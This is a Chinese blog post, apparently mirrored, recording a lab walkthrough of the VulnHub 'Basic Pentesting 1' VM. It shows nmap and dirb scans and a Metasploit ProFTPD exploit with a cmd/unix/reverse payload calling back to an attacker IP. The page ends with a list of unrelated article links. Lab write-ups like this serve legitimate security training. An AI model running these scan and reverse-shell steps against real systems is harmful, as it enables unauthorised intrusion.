当前位置: 首页 > news >正文

Basic penetration_1靶机渗透

news 2024/12/22 20:04:56

在这里插入图片描述

项目地址

```plain https://download.vulnhub.com/basicpentesting/basic_pentesting_1.ova ```

实验过程

开启靶机虚拟机

![](https://img-blog.csdnimg.cn/img_convert/4135d3c176bdca1f661f756b8321c97a.png)

使用nmap进行主机发现,获取靶机IP地址

```plain nmap 192.168.47.1-254 ```

根据对比可知Basic penetration:1的一个ip地址为192.168.47.168

扫描Basic penetration:1的操作系统,端口及对应服务

```plain nmap -A -p- 192.168.47.168 ```

发现该靶机开放了21,22,80端口

目录扫描

```plain dirb http://192.168.47.168 ```

信息收集

访问网站

发现是apache框架

提权

```plain msfconsole search ProFTPD ``` 

use 5
show options


set rhosts 192.168.47.168
set payload cmd/unix/reverse
set lhost 192.168.47.129
run

查看当前用户

提权成功
好小子,离成功又近一步!!!


http://www.mrgr.cn/news/48337.html

相关文章:

  • LEAST-TO-MOST PROMPTING ENABLES COMPLEX REASONING IN LARGE LANGUAGE MODELS---正文
  • 矩阵:Input-Output Interpretation of Matrices (中英双语)
  • 基于字节大模型的论文翻译(含免费源码)
  • linux环境使用yum方式安装nginx
  • 打通全网SEO优化:提高百度、B站、抖音等平台搜索排名
  • Qt中C++泛型实现ORM操作数据库SQLite实战
  • 数据结构——树和森林
  • Bob_ 1.0.1靶机渗透
  • Linux `sort` 命令详解
  • 【Python】Python实现串口通信(Python+Stm32)
  • 1374. 生成每种字符都是奇数个的字符串
  • 18708 最大子段和
  • ARM学习(32)FreeRTOS 调度和timer流程
  • Java->Map和Set
  • Jave常用的类---String类
  • 英语中 ing后缀
  • BUG修复(不断整理想起什么就整理什么)
  • Java中的流:高效处理数据的新方式
  • Vivado工程如何生成TCL文件以及如何利用TCL文件还原工程
  • 2025秋招倒计时---招联金融
  • 阿里云短信接口配置信息利用方式
  • jenkins 插件SSH Pipeline Steps
  • ReactOS系统 PAGED_CODE 宏函数的实现
  • STM32-ADC模数转换
  • 【作业题】
  • OpenCV HoughLine()函数与HoughlinesP()函数及HoughCircles()函数详解及用法示例